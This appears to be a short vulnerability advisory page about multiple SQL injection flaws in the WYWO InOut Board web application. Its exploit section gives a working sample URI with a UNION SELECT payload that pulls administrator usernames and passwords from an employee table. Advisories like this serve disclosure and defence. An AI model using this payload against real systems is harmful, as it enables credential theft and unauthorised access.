• info
• discussion
• exploit
• solution
• references

WYWO InOut Board Multiple SQL Injection Vulnerabilities

Attackers can exploit this issue via a web client.

The following sample URIs are available:

http://www.example.com/phonemessage.asp?num=-1%20union%20select%200,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20employee%20where%20Admin='Yes'
http://www.example.com/[path]//faqDsp.asp?catcode=[SQL]

• /data/vulnerabilities/exploits/21772.php